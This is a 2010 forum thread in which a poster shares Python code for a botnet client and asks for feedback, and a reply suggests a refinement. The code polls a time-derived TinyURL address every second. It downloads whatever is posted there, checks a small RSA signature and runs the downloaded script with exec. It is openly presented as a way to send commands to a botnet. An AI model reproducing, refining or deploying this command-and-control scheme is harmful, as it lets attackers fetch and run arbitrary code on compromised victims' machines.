N3Ar Posted February 23, 2010 Share Posted February 23, 2010 (edited) Hey guys I just watched the show, episode 701, and Mr daren made a comment about everyone beeing able to send commands to the botnet. He also asked what kind of language could be used(and he mentioned python). Well I think that hashing the script+signing the script using an RSA key would do the trick.. I'm using the tinyurl idea, anyways i wrote a litle piece of code, so everyone could get the idea.. import urllib2 import time #I'm using the build-in commands to make everything simple to understand. #i used on purpose a very small rsa key. Here is the private part: #1010693124043243545751267641549720737580824554323031507505058361376182502064774 3669133551435099535035835371621642498954346254965071187678761958624260885369 exp=3 rsakey=6737954160288290305008450943664804917205497028820210050033722409174550013 76502819075007717863922529820033825362060571087308695102967167320217085438219053 1 def check_web (): nowis=time.asctime() i=abs(hash(nowis)) #you MUST change this hashing function! print "opening http://tinyurl.com/%s"%i web=urllib2.urlopen("http://tinyurl.com/%s"%i) text=web.read() web.close() if "Please check that the URL entered is correct. To learn more about TinyURL.com, please visit the" in text: print "the url did not exist!" else : print "url found!" if "###END###" in text: try: script,key=text.split("###END###") key=int(key) except: print 'more than one "###END###" in text' else: #will be executed if exception doesn't occur if pow(key,exp,rsakey)==abs(hash(script+nowis)): # This is the reason why i wrote it in python: exec script else : print 'no "###END###" in text' while 1: time.sleep(1) check_web() and it does work prety well... Note that if i use script+nowis for the hash, it is because i want a command to be executed only once. And it makes me think, there was a big trojan recently that used the same idea, but with domain names ^^$ Anyways, i'd like some feedback, your ideas.. Edited February 23, 2010 by N3Ar Quote Link to comment Share on other sites More sharing options...
Keltha Posted March 1, 2010 Share Posted March 1, 2010 I think reducing the accuracy of the time from seconds to maybe every 10 seconds would be a good idea, also try appending a salt to the time before hashing it. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.